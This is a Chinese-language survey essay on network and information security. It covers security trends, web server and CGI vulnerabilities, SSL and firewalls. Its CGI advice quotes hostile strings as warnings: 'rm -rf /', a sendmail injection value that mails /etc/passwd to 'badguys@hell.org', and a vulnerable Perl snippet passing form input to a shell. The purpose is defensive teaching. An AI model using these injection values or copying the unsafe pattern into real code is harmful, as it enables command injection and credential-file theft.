无线通信综述题.docx

上传人:b****3 文档编号:4915290 上传时间:2022-12-11 格式:DOCX 页数:7 大小:23.65KB
下载 相关 举报
无线通信综述题.docx_第1页
第1页 / 共7页
无线通信综述题.docx_第2页
第2页 / 共7页
无线通信综述题.docx_第3页
第3页 / 共7页
无线通信综述题.docx_第4页
第4页 / 共7页
无线通信综述题.docx_第5页
第5页 / 共7页
点击查看更多>>
下载资源
资源描述

无线通信综述题.docx

《无线通信综述题.docx》由会员分享,可在线阅读,更多相关《无线通信综述题.docx(7页珍藏版)》请在冰豆网上搜索。

无线通信综述题.docx

无线通信综述题

1.网络与信息安全的国内外发展现状与趋势 

1.国外网络安全技术的现状

(1)构建完善网络安全保障体系

针对未来网络信息战和各种网络威胁、安全隐患越来越暴露的安全问题。

新的安全需求、新的网络环境、新的威胁,促使美国和其他很多发达国家为具体的技术建立一个以深度防御为特点的整体网络安全平台——网络安全保障体系。

(2)优化安全智能防御技术

美国等国家对入侵检测、漏洞扫描、入侵防御技术、防火墙技术、病毒防御、访问控制、身份认证等传统的网络安全技术进行更为深入的研究,改进其实现技术,为国防等重要机构研发了新型的智能入侵防御系统、检测系统、漏洞扫描系统、防火墙、统一资源管理等多种安全产品。

另外,美国还结合生物识别、公钥基础设施PKI(PublicKeyInfrastructure)和智能卡技术研究访问控制技术。

美国军队将生物测量技术作为一个新的研究重点。

从美国发生了恐怖袭击事件,进一步意识到生物识别技术在信息安全领域的潜力。

除利用指纹、声音成功鉴别身份外,还发展了远距人脸扫描和远距虹膜扫描的技术,避免了传统识别方法易丢失、易欺骗等许多缺陷。

(3)强化云安全信息关联分析

目前,针对各种更加复杂及频繁的网络攻击,加强对单个入侵监测系统数据和漏洞扫描分析等层次的云安全技术的研究,及时地将不同安全设备、不同地区的信息进行关联性分析,快速而深入地掌握攻击者的攻击策略等信息。

美国在捕获攻击信息和扫描系统弱点等传统技术上取得了很大的进展。

(4)加强安全产品测评技术

系统安全评估技术包括安全产品评估和信息基础设施安全性评估技校。

美国受恐怖袭击“9.11”事件以来,进一步加强了安全产品测评技术,军队的网络安全产品逐步采用在网络安全技术上有竞争力的产品,需要对其进行严格的安全测试和安全等级的划分,作为选择的重要依据。

(5)提高网络生存(抗毁)技术

美军注重研究当网络系统受到攻击或遭遇突发事件、面临失效的威胁时,尽快使系统关键部分能够继续提供关键服务,并能尽快恢复所有或部分服务。

结合系统安全技术,从系统整体考虑安全问题,是网络系统更具有韧性、抗毁性,从而达到提高系统安全性的目的。

主要研究内容包括进程的基本控制技术、容错服务、失效检测和失效分类、服务分布式技术、服务高可靠性控制、可靠性管理、服务再协商技术。

(6)优化应急响应技术

在美国“9.11”袭击事件五角大楼被炸的灾难性事件中,应急响应技术在网络安全体系中不可替代的作用得到了充分的体现。

仅在遭受袭击后几小时就基本成功地恢复其网络系统的正常运作,主要是得益于事前在西海岸的数据备份和有效的远程恢复技术。

在技术上有所准备,是美军五角大楼的信息系统得以避免致命破坏的重要原因。

(7)新密码技术的研究

美国政府在进一步加强传统密码技术研究的同时,研究和应用改进新椭圆曲线和AES等对称密码,积极进行量子密码新技术的研究。

量子技术在密码学上的应用分为两类:

一是利用量子计算机对传统密码体制进行分析;二是利用单光子的测不准原理在光纤一级实现密钥管理和信息加密,即量子密码学。

2.我国网络安全技术方面的差距

我国对网络安全技术研究非常重视,已经纳入国家“973”计划、“863”计划和国家自然科学基金等重大高新技术研究项目,而且在密码技术等方面取得重大成果。

但是,与先进的发达国家的新技术、新方法、新应用等方面相比还有差距,应当引起警觉和高度重视,特别是一些关键技术必须尽快赶上,否则“被动就要挨打”。

(1)安全意识差,忽视风险分析

我国较多企事业机构在进行构建及实施网络信息系统前,经常忽略或简化风险分析,导致无法全面地认识系统存在的威胁,很可能导致安全策略、防护方案脱离实际。

(2)急需自主研发的关键技术

现在,我国计算机软硬件包括操作系统、数据库系统等关键技术严重依赖国外,而且缺乏网络传输专用安全协议,这是最大的安全隐患、风险和缺陷,一旦发生信息战时,非国产的芯片、操作系统都有可能成为对方利用的工具。

所以,急需进行操作系统等安全化研究,并加强专用协议的研究,增强内部信息传输的保密性。

对于已有的安全技术体系,包括访问控制技术体系、认证授权技术体系、安全DNS体系、公钥基础设施PKI技术体系等,并制订持续性发展研究计划,不断发展完善,为网络安全保障充分发挥更大的作用。

(3)安全检测防御薄弱

网络安全检测与防御是网络信息有效保障的动态措施,通过入侵检测与防御、漏洞扫描等手段,定期对系统进行安全检测和评估,及时发现安全问题,进行安全预警,对安全漏洞进行修补加固,防止发生重大网络安全事故。

我国在安全检测与防御方面比较薄弱,应研究将入侵检测与防御、漏洞扫描、路由等技术相结合,实现跨越多边界的网络入侵攻击事件的检测、防御、追踪和取证。

(4)安全测试与评估不完善

如测试评估的标准还不完整,测试评估的自动化工具匮乏,测试评估的手段不全面,渗透性测试的技术方法贫乏,尤其在评估网络整体安全性方面。

(5)应急响应能力欠缺

应急响应就是对网络系统遭受的意外突发事件的应急处理,其应急响应能力是衡量系统生存性的重要指标。

网络系统一旦发生突发事件,系统必须具备应急响应能力,使系统的损失降至最低,保证系统能够维持最必需的服务,以便进行系统恢复。

我国应急处理的能力较弱,缺乏系统性,对系统存在的脆弱性、漏洞、入侵、安全突发事件等相关知识研究不够深入。

特别是在跟踪定位、现场取证、攻击隔离等方面的技术,缺乏研究和相应的产品。

(6)强化系统恢复技术不足

网络系统恢复指系统在遭受破坏后,能够恢复为可用状态或仍然维持最基本服务的能力。

我国在网络系统恢复方面的工作,主要从系统可靠性角度进行考虑,以磁盘镜像备份、数据备份为主,以提高系统的可靠性。

然而,系统可恢复性的另一个重要指标是当系统遭受毁灭性破坏后的恢复能力,包括整个运行系统的恢复和数据信息的恢复等。

在这方面的研究明显存在差距,应注重相关远程备份、异地备份与恢复技术的研究,包括研究远程备份中数据一致性、完整性、访问控制等关键技术。

3.网络安全技术的发展态势

网络安全的发展态势主要体现在以下几个方面:

(1)网络安全技术水平不断提高

随着网络安全威胁的不断加剧和变化,网络安全技术正在不断创新和提高,从传统安全技术向可信技术、深度检测、终端安全管控和Web安全等新技术发展,也不断出现一些云安全、智能检测、智能防御技术、加固技术、网络隔离、可信服务、虚拟技术、信息隐藏技术和软件安全扫描等新技术。

可信技术是一个系统工程,包含可信计算技术、可信对象技术和可信网络技术,用于提供从终端及网络系统的整体安全可信环境。

(2)安全管理技术高度集成

网络安全技术优化集成已成趋势,如杀毒软件与防火墙集成、虚拟网VPN与防火墙的集成、入侵检测系统IDS与防火墙的集成,以及安全网关、主机安全防护系统、网络监控系统等集成技术。

(3)新型网络安全平台

统一威胁管理UTM(UnifiedThreatManagement)是实现网络安全的重要手段,也是网络安全技术发展的一大趋势,已成为集多种网络安全防护技术一体化的解决方案,在保障网络安全的同时大量降低运维成本。

主要包括:

网络安全平台、统一威胁管理工具和日志审计分析系统等。

将在5.5.5中具体进行介绍。

2.网络和信息安全的现有技术基础

1.必须重视网络安全

计算机的安全性历来都是人们讨论的主要话题之一。

而计算机安全主要研究的是计算机病毒的防治和系统的安全。

在计算机网络日益扩展和普及的今天,计算机安全的要求更高,涉及面更广。

不但要求防治病毒,还要提高系统抵抗外来非法黑客入侵的能力,还要提高对远程数据传输的保密性,避免在传输途中遭受非法窃取。

在防治网络病毒方面,在http传输中HTML文件是一般不会存在感染病毒的危险。

危险在于下载可执行软件如:

.zip.exe.arj.Z等文件过程中应特别加以注意。

都有潜伏病毒的可能性。

对于系统本身安全性,主要考虑服务器自身稳定性、健状性,增强自身抵抗能力,杜绝一切可能让黑客入侵的渠道,避免造成对系统的威胁。

对重要商业应用,必须加上防火墙和数据加密技术加以保护。

在数据加密方面,更重要的是不断提高和改进数据加密技术,使不法分子难有可乘之机。

当然,计算机系统安全是个很大的范畴,本文仅仅讨论在构造web时,可能出现的一些情况,希望能引起重视。

2.WEB在安全上的漏洞

WEB服务器上的漏洞可以从以下几方面考虑:

(1)在web服务器上你不让人访问的秘密文件、目录或重要数据。

(2)从远程用户向服务器发送信息时,特别是信用卡之类东西时,中途遭不法分子非法拦截。

(3)web服务器本身存在的一些漏洞,使得一些人能侵入到主机系统破坏一些重要的数据,甚至造成系统瘫痪。

(4)CGI安全方面的漏洞有:

  1〕有意或无意在主机系统中遗漏(bugs)给非法黑客创造条件。

  2〕用CGI脚本编写的程序当涉及到远程用户从浏览器中输入表格(form)并进行象检索(Searchindex)或form-mail之类在主机上直接操作命令时,或许会给web主机系统造成危险。

因此,从CGI角度考虑WEB的安全性,主要是在编制程序时,应详细考虑到安全因素。

尽量避免CGI程序中存在漏洞。

从web服务器版本上分析:

在1995年3月发现NCSA1.3以下版本的HTTPD明显存在安全上的漏洞,即客户计算机可以任意地执行服务器上面的命令,非常危险。

但,NCSA1.4以上版本的服务器就补上了这个漏洞。

还有一些简单的从网上下载WEB服务器,没有过多考虑到一些安全因素,不能用作商业应用。

因此,不管是配置服务器,还是在编写CGI程序时都要注意系统的安全性。

尽量堵住任何存在的漏洞,创造安全的环境。

在具体服务器设置及编写cgi程序时应该注意:

管理服务器上

1)禁止乱用从其他网中下载的一些工具软件,并在没有详细了解之前尽量不要用root身份注册执行。

以防止某些程序员在程序中设下的陷井,如:

程序中加上一两行"rm-rf/"或"mailusername《/etc/passwd"之类情况发生。

2)在选用web服务器时,应考虑到不同服务器对安全的要求不一样。

一些简单的web服务器就没有考虑到一些安全的因素,不能把他用作商业应用。

只作一些个人的网点。

3)在利用WEB中的.htpass来管理和校验用户口令时,存在校验的口令和用户名不受次数限制。

3.如何在WEB上提高系统安全性和稳定性

web服务器安全预防措施:

〔1〕限制在web服务器开帐户,定期删除一些断进程的用户。

〔2〕对在web服务器上开的帐户,在口令长度及定期更改方面作出要求,防止被盗用。

〔3〕尽量使ftp,mail等服务器与之分开,去掉ftp,sendmail,tftp,NIS,NFS,finger,netstat等一些无关的应用。

〔4〕在web服务器上去掉一些绝对不用的shell等之类解释器,即当在你的cgi的程序中没用到perl时,就尽量把perl在系统解释器中删除掉。

〔5〕定期查看服务器中的日志logs文件,分析一切可疑事件。

在errorlog中出现rm,login,/bin/perl,/bin/sh等之类记录时,你的服务器可能有受到一些非法用户的入侵的尝试。

〔6〕设置好web服务器上系统文件的权限和属性,对可让人访问的文档分配一个公用的组如:

www,并只分配它只读的权利。

把所有的HTML文件归属WWW组,由WEB管理员管理WWW组。

对于WEB的配置文件仅对WEB管理员有写的权利。

〔7〕有些WEB服务器把WEB的文档目录与FTP目录指在同一目录时,应该注意不要把FTP的目录与CGI-BIN指定在一个目录之下。

这样是为了防止一些用户通过FTP上在一些尤如PERL或SH之类程序并用WEB的CGI-BIN去执行造成不良后果。

〔8〕通过限制许可访问用户IP或DNS

〔9〕WINDOWS下HTTPD

从CGI编程角度考虑安全:

〔1〕采用编译语言比解释语言会更安全些,并且CGI程序应放在独立于HTML存放目录之外的CGI-BIN下,是为了防止一些非法访问者从浏览器端取得解释性语言的原代码后从中寻找漏洞。

〔2〕在用C来编写CGI程序时尽量少用popen(),system()和所有涉及/bin/sh的shell命令。

在Perl中system(),exec(),open(),eval()等exec或eval之类命令。

在由用户填写的form还回cgi时,不要直接调用system()之类函数。

这是为避免当填写内容为“rm-rf/*”或“/usr/lib/sendmailnobody@;mailbadguys@hell.org《/etc/passwd”之类内容。

〔3〕用Perl编写CGI时如:

 $mail_to=&get_name_from_input;

   open(MAIL,"|/usr/lib/sendmail$mail_to");

    printMAIL"To:

$mailto\nFrom:

me\n\nHithere!

\n";

    closeMAIL;

该小程序是把客户浏览器的form到服务器的mail处理程序。

另外,对于数据的加密与传输,目前有SSL,SHTTP,SHEN等协议。

〔1〕SSL(SecureSocketLayer)系由Netscape公司建议的一种建构在TCP协议之上的保密措施通讯协议,不但适用于HTTP,而且还适用于TELNET,FTP,NNTP,GOPHER等客户/服务器模式的安全协议。

NetscapeNavigator,SecureMosaic,和MicrosoftInternetExplorer等客户浏览器与Netscape,Microsoft,IBM,Quarterdeck,OpenMarket和O'Reilly等服务器产品都采用SSL协议。

〔2〕SHTTP(SecureHTTP)系由CommerceNet公司建议构造在HTTP协议之上的高层协议。

目前由OpenMarket公司推销的OpenMarketplace服务器结合EnterpriseIntegrationTechnologies的SecureHTTPMosaic客户浏览器采用S-HTTP。

4.防火墙(Firewall)

(1)防火墙的概念

当一个网络接上Internet之后,系统的安全除了考虑计算机病毒、系统的健壮性之外,更主要的是防止非法用户的入侵。

而目前防止的措施主要是靠防火墙的技术完成。

防火墙(firewall)是指一个由软件或和硬件设备组合而成,处于企业或网络群体计算机与外界通道(Internet)之间,限制外界用户对内部网络访问及管理内部用户访问外界网络的权限。

随着人们对网络安全意识提高,在网络的防火墙上采取许多做法并也已开发出很多防火墙的产品。

另外,有关防火墙更详细的情况请在Yahoo网点上用关键词firewall来查询更多有关firewall信息。

(2)防火墙的措施

目前主要采用的是两种结构:

1》代理(Proxy)主机

内部网络《-----》代理网关(ProxyGateway)《-----》Internet,这种方式是内部网络与Internet不直接通讯。

就是内部网络计算机用户与代理网关采用一种通讯方式即提供内部网络协议(Netbios、TCP/IP等)。

而,网关与Internet之间采取的是标准TCP/IP网络通讯协议。

这样使得网络数据包不能直接在内外网络之间进行。

内部计算机必须通过代理网关访问Internet,这样容易在代理服务器上对内部网络计算机对访问外界计算机进行限制。

另外,由于代理服务器两端采用不同协议标准也可以直接阻止外界非法入侵。

还有,代理服务的网关可对数据封包进行验证和对密码进行确认等安全管制。

这样,能较好地控制管理两端的用户起到防火墙作用。

可想而知,这种防火墙措施是采用透过代理服务器进行,在联机用户多时,效率必然受到影响,代理服务器负担很重,并且许多访问Internet的客户软件在内部网络计算机中无法正常访问Internet。

2》路由器加过滤器(ScreenedHost)完成

内部网络《-----》过滤器(Filter)《----》路由器(Router)《----》Internet,这种结构由路由器和Filter共同完成对外界计算机访问内部网络从IP地址或域名上的限制,也可以指定或限制内部网络访问Internet。

路由器仅对筛虑主机的特定的PORT上数据通讯加以路由,而Filter主机则执行筛选、过滤、验证及其安全监控,这样可以很大程度隔断内外网络间的不正常的访问登陆。

3.网络和信息安全研究的主要内容

研究的主要内容主要有网络安全、主机(服务器)安全、应用(系统)安全、数据安全,以及桌面终端安全等方面。

网络安全从其本质上来讲就是网络上的信息安全。

从广义来说,凡是涉及到网络上信息的保密性、完整性、可用性、真实性和可控性的相关技术和理论都是网络安全的研究领域。

网络安全涉及计算机科学、网络技术、通信技术、密码技术、信息安全技术、应用数学、数论、信息论等多种学科的综合性学科。

网络安全应具有以下五个方面的特征:

1.保密性:

信息不泄露给非授权用户、实体或过程,或供其利用的特性。

2.完整性:

数据XX不能进行改变的特性。

即信息在存储或传输过程中保持不被修改、不被破坏和丢失的特性。

3.可用性:

可被授权实体访问并按需求使用的特性。

即当需要时能否存取所需的信息。

例如网络环境下拒绝服务、破坏网络和有关系统的正常运行等都属于对可用性的攻击;

4.可控性:

对信息的传播及内容具有控制能力。

5.可审查性:

出现的安全问题时提供依据与手段。

从网络运行和管理者角度说,他们希望对本地网络信息的访问、读写等操作受到保护和控制,避免出现“陷门”、病毒、非法存取、拒绝服务和网络资源非法占用和非法控制等威胁,制止和防御网络黑客的攻击。

对安全保密部门来说,他们希望对非法的、有害的或涉及国家机密的信息进行过滤和防堵,避免机要信息泄露,避免对社会产生危害,对国家造成巨大损失。

从社会教育和意识形态角度来讲,网络上不健康的内容,会对社会的稳定和人类的发展造成阻碍,必须对其进行控制。

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > 外语学习 > 英语学习

copyright@ 2008-2022 冰豆网网站版权所有

经营许可证编号:鄂ICP备2022015515号-1